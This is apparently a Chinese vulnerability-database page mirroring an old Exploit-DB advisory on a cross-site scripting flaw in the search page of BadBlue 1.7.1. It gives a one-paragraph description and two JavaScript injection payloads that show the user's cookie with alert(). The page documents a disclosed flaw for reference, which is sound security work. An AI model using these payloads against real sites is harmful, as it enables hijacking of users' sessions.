Working Resources BadBlue 1.7.1 – Search Page Cross-Site Scripting

Working Resources BadBlue 1.7.1 – Search Page Cross-Site Scripting

漏洞ID 1053642 漏洞类型
发布时间 2002-11-25 更新时间 2002-11-25
图片[1]-Working Resources BadBlue 1.7.1 – Search Page Cross-Site Scripting-安全小百科CVE编号 N/A
图片[2]-Working Resources BadBlue 1.7.1 – Search Page Cross-Site Scripting-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22045
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6253/info

The ext.dll ISAPI does not sufficiently sanitize user-supplied input when processing search queries. This may allow an attacker to create a custom URL containing script code that, when viewed in a browser by a legitimate user, will result in the execution of the script code. 

');alert(document.cookie);//
')" style="left:expression(eval('alert(document.cookie)'))">

相关推荐: Compaq Java Applet for Presario SpawnApp – Code Execution

Compaq Java Applet for Presario SpawnApp – Code Execution 漏洞ID 1053376 漏洞类型 发布时间 1998-11-28 更新时间 1998-11-28 CVE编号 N/A CNNVD-ID N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享